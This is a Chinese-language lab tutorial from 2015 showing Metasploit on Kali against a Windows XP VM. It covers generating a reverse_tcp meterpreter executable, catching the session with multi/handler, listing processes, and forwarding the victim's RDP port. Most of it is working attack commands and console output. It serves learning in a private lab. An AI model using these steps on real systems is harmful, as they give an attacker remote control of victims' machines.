今天来熟悉一下meterpreter,使用环境是KALI、windowsXP

 

Kali地址:192.168.11.41

windowsXP地址:192.168.11.58

 

***杂记2015-01-21_第1张图片

***杂记2015-01-21_第2张图片

 

  1. 首先生成可执行文件

    root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.11.41 LPORT=444 X > meter.exe
    Created by msfpayload (http://www.metasploit.com).
    Payload: windows/meterpreter/reverse_tcp
     Length: 287
    Options: {"LHOST"=>"192.168.11.41", "LPORT"=>"444"}
    root@kali:~# ls
    192.168.11.42  Desktop  meter.exe  O  OpenVAS_TI.asc

  2. 开启本地监听

root@kali:~# msfconsole
Call trans opt: received. 2-19-98 13:24:18 REC:Loc

     Trace program: running

           wake up, Neo...
        the matrix has you
      follow the white rabbit.

          knock, knock, Neo.

                        (`.         ,-,
                        ` `.    ,;' /
                         `.  ,'/ .'
                          `. X /.'
                .-;--''--.._` ` (
              .'            /   `
             ,           ` '   Q '
             ,         ,   `._    \
          ,.|         '     `-.;_'
          :  . `  ;    `  ` --,.._;
           ' `    ,   )   .'
              `._ ,  '   /_
                 ; ,''-,;' ``-
                  ``-..__``--`

                             http://metasploit.pro


Taking notes in notepad? Have Metasploit Pro track & report
your progress and findings -- learn more on
http://rapid7.com/metasploit

       =[ metasploit v4.9.2-2014051401 [core:4.9 api:1.0] ]
+ -- --=[ 1310 exploits - 780 auxiliary - 221 post        ]
+ -- --=[ 335 payloads - 35 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial:
http://r-7.co/trymsp ]

msf > use exploit/multi/handler
msf exploit(handler) > info

       Name: Generic Payload Handler
     Module: exploit/multi/handler
   Platform: Android, BSD, Java, JavaScript, Linux, OSX, NodeJS, PHP, Python, Ruby, Solaris, Unix, Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Manual

Provided by:
  hdm <
[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Wildcard Target

Payload information:
  Space: 10000000
  Avoid: 0 characters

Description:
  This module is a stub that provides all of the features of the
  Metasploit payload system to exploits that have been launched
  outside of the framework.

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > info

       Name: Generic Payload Handler
     Module: exploit/multi/handler
   Platform: Android, BSD, Java, JavaScript, Linux, OSX, NodeJS, PHP, Python, Ruby, Solaris, Unix, Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Manual

Provided by:
  hdm <
[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Wildcard Target

Payload information:
  Space: 10000000
  Avoid: 0 characters

Description:
  This module is a stub that provides all of the features of the
  Metasploit payload system to exploits that have been launched
  outside of the framework.

msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 444
LPORT => 444
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     0.0.0.0          yes       The listen address
   LPORT     444              yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > run

[*] Started reverse handler on 0.0.0.0:444
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 192.168.11.58
[*] Meterpreter session 1 opened (192.168.11.41:444 -> 192.168.11.58:1057) at 2015-01-21 01:40:09 -0500

 

3.在192.168.11.58上执行meter.exe

meterpreter > ifconfig

Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1


Interface  2
============
Name         : VMware Accelerated AMD PCNet Adapter - pencS zHardware MAC : 00:0c:29:c6:de:84
MTU          : 1500
IPv4 Address : 192.168.11.58
IPv4 Netmask : 255.255.255.0

meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session     User                           Path
 ---   ----  ----               ----  -------     ----                           ----
 0     0     [System Process]         4294967295                                
 4     0     System             x86   0                                         
 212   712   vmtoolsd.exe       x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 440   384   conime.exe         x86   0           WWW-95A235B5556\Administrator  C:\WINDOWS\system32\conime.exe
 568   4     smss.exe           x86   0           NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
 636   568   csrss.exe          x86   0           NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\csrss.exe
 668   568   winlogon.exe       x86   0           NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\winlogon.exe
 712   668   services.exe       x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\services.exe
 724   668   lsass.exe          x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\lsass.exe
 884   712   vmacthlp.exe       x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 912   712   svchost.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\svchost.exe
 976   712   svchost.exe        x86   0                                          C:\WINDOWS\system32\svchost.exe
 1072  712   svchost.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
 1236  712   svchost.exe        x86   0                                          C:\WINDOWS\system32\svchost.exe
 1436  712   svchost.exe        x86   0                                          C:\WINDOWS\system32\svchost.exe
 1444  1416  explorer.exe       x86   0           WWW-95A235B5556\Administrator  C:\WINDOWS\Explorer.EXE
 1460  712   ZhuDongFangYu.exe  x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\360\360Safe\deepscan\zhudongfangyu.exe
 1568  1444  cmd.exe            x86   0           WWW-95A235B5556\Administrator  C:\WINDOWS\system32\cmd.exe
 1628  712   spoolsv.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\spoolsv.exe
 1784  1444  meter.exe          x86   0           WWW-95A235B5556\Administrator  $U$C:\Documents and Settings\Administrator.WWW95A235B5556\\meter.exe-0x433a5c446f63756d656e747320616e642053657474696e67735c41646d696e6973747261746f722e5757572d39354132333542353535365cd7c0c3e65c6d657465722e657865
 1804  1444  vmtoolsd.exe       x86   0           WWW-95A235B5556\Administrator  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1820  1444  ctfmon.exe         x86   0           WWW-95A235B5556\Administrator  C:\WINDOWS\system32\ctfmon.exe

 

4.在192.168.11.58上开启端口反弹,192.168.11.58上的3389端口反弹到192.168.11.41上的2222端口

 

meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]


OPTIONS:

    -L   The local host to listen on (optional).
    -h        Help banner.
    -l   The local port to listen on.
    -p   The remote port to connect to.
    -r   The remote host to connect to.
meterpreter > portfwd add -l 2222 -r 192.168.11.58 -p 3389
[*] Local TCP relay created: 0.0.0.0:2222 <-> 192.168.11.58:3389
meterpreter > portfwd
0: 0.0.0.0:2222 -> 192.168.11.58:3389

1 total local port forwards.

***杂记2015-01-21_第3张图片

***杂记2015-01-21_第4张图片